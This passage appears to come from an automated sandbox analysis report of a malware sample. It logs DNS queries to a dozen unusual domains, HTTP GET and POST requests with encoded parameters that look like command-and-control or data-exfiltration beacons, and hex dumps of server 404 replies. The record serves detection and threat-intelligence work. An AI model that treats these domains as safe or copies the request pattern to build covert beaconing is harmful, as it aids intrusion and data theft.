                Source: global trafficHTTP traffic detected: GET /5cm4/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=ZOi5UH6lCHBhnBF9yu7lTl97V2po4KHEvqmaFY3uiUnnM3Kevyv9Tk9tf7brSgBHOaIF9h93DunAghZY9lTBZL9WpirrmBEOY4nZmUaXlywW6LOtEGR1afh1jX/LxafgQA== HTTP/1.1Host: www.emirates-visa.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gn0y/?LDVlCz=deG7RjeXnjjKJ6Ot/ZvT1ZCOdrvHxkgph9CMZ5BhYMmF8u0wO9qMaDcK53O3JwyOf3l+Oc7MzAVt2qPkHXgf7ZhvCL0D4R10rxSbaYIqOAV7xlWd89x6BKiu35RrP0Id3g==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.070001813.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /f95q/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=kbZ+3TVQWfE7KiBcybfm9WvlwV1TJfIMHZM6kD8OpyCP9Gh7sWOPFpouLIgiGz3sUBqRfaXNkxnyQnhTpFi/D08FMGsEDjNddsm/ASVO0JLXKussNUmxA8HGD8mS8NlSug== HTTP/1.1Host: www.activateya.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qei1/?LDVlCz=nNC+GBX2ggWuM05tEEqRTuHIkAvcf+dXy/bvByniPoLRj52NglzWV1Nft7BNtL9++4tRfUwg9XmNi4A2kp9kOCOyWvDUT5wtJii7I2tTBBgakefdRMv39WDJ4M987EpnCg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.walkecode.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gejp/?LDVlCz=B8lENIMSkdQf4FGQc5K+k257k877TXD8FgVAfBzrbl9XXLWxyw5ahRnSZIhzPxA1TMan6vpZ6mPmpcnGRYODwaH5MOJowBwrmH/nBLcALJg/EQzrJ0QQeK+YBPbGWQ4zHw==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.ciemanr.questAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1h7d/?LDVlCz=GhVUl+BMvYJ5ZB/G+p82cySXkvn+9vYw5d6SxNhFTeZQzODCqlJRcn8j1xBkKA1XTq1Cn2kO8HKqHDF15Seo3gBfn1d442lRHkqyo3MG/ycD+W3sgPB+1QYdeAS4c5YMDQ==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.growbamboo.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /icu6/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=762QZ2SV6NpjcpWEPp/HDXxWZXZX1W4w6TtwEwMqgABTEXEh+wW122QWjov6SciVl+aW6WWJfJ+5Cw+tTwbMJ19RlEhii/WIAwuvAuC5wag6L1em5+IXdi875fnKjGjeWw== HTTP/1.1Host: www.primespot.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7sjiwZWkJjUpQH/sr9gZIVnDBJgsPBR+fKmpaKAjd6wyxi+eq8Hgh+Droj+Yb9QbnJwQg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.hisako.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n0se/?LDVlCz=hkrsNdm9A7NEs6AELC9hc5Biy4ux3a/2UN9Ti/zPtL1d4UFJsQdYSGmB1x8mN1/no5/doAmWeXNISuQ7Z6M7ARUekuecQYjdGGqJoetNg5rktHF3zD1BwWzApk9VpjBEpg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.rwse6wjx.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9lgl/?LDVlCz=NTK3NLhlAEJIOtoeBFtljOkEhfYZVbBGiOzAI1f+R144iBEE4BOnuC3DqsUysY3FH9LbQrV9xfPYm9YM/jyzxs8eKdKq7NnxOPLJXW8Qu/cpUMw46FhSxTz+BHey1p9/Wg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.17jkgl.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /laeb/?LDVlCz=R1QkcJ3G5DA9kU07Q4bHZGXwpE7poG4obEoFTYXYr0KTY8cjuufgj2Wfg7CEtb/if9/3otTPHXcvO0KabB4WT9d0qR/eTQNYs+qdxysYlPDjIZ08l2KjBlYrb7eSynDgaw==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.thezensive.workAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /26nq/?LDVlCz=03R0/PY94GJRzPoOKSenb2h5QS/Kl50E/qK0YcgrJ8wpZCLSP+GtGIEwrkK3Oa2ONw/TguZq9BdWMDmUOrZ+COkHC5rjPuI42FsUNzu6Vv93haoOa+yyAoKItnrc6cGBtQ==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1Host: www.zrichiod-riech.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.emirates-visa.net
                Source: global trafficDNS traffic detected: DNS query: www.070001813.xyz
                Source: global trafficDNS traffic detected: DNS query: www.activateya.life
                Source: global trafficDNS traffic detected: DNS query: www.walkecode.top
                Source: global trafficDNS traffic detected: DNS query: www.ciemanr.quest
                Source: global trafficDNS traffic detected: DNS query: www.growbamboo.xyz
                Source: global trafficDNS traffic detected: DNS query: www.primespot.live
                Source: global trafficDNS traffic detected: DNS query: www.hisako.shop
                Source: global trafficDNS traffic detected: DNS query: www.rwse6wjx.sbs
                Source: global trafficDNS traffic detected: DNS query: www.17jkgl.com
                Source: global trafficDNS traffic detected: DNS query: www.thezensive.work
                Source: global trafficDNS traffic detected: DNS query: www.zrichiod-riech.sbs
                Source: global trafficDNS traffic detected: DNS query: www.wtsshnm.top
                Source: unknownHTTP traffic detected: POST /gn0y/ HTTP/1.1Host: www.070001813.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.070001813.xyzReferer: http://www.070001813.xyz/gn0y/Content-Length: 207Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36Data Raw: 4c 44 56 6c 43 7a 3d 51 63 75 62 53 55 61 30 76 6a 7a 6f 4d 2f 72 42 32 2b 6a 31 77 62 58 4d 61 34 32 4d 2f 6a 51 6e 32 61 6d 72 62 49 74 43 62 4e 71 67 39 4f 70 53 66 59 4b 71 50 46 59 46 31 43 2b 77 47 6d 69 6f 4d 30 6f 46 55 38 66 63 6f 7a 56 39 30 5a 58 6c 51 48 64 6e 77 2f 56 62 41 36 46 6c 72 42 77 46 68 41 44 64 66 34 34 56 55 43 42 42 68 31 69 33 35 76 70 31 45 35 47 59 35 49 74 4b 4e 6c 46 77 30 74 6a 36 49 75 39 77 44 55 62 6f 6a 54 72 4e 6e 38 62 51 6b 43 58 36 59 4e 73 70 49 65 4c 61 41 45 58 67 61 54 6a 64 4e 55 7a 75 50 50 51 54 43 4f 4d 68 64 78 75 77 48 44 68 52 42 54 48 57 37 4e 36 65 35 55 63 3d Data Ascii: LDVlCz=QcubSUa0vjzoM/rB2+j1wbXMa42M/jQn2amrbItCbNqg9OpSfYKqPFYF1C+wGmioM0oFU8fcozV90ZXlQHdnw/VbA6FlrBwFhADdf44VUCBBh1i35vp1E5GY5ItKNlFw0tj6Iu9wDUbojTrNn8bQkCX6YNspIeLaAEXgaTjdNUzuPPQTCOMhdxuwHDhRBTHW7N6e5Uc=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:18:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:18:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:19:19 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:19:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:19:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 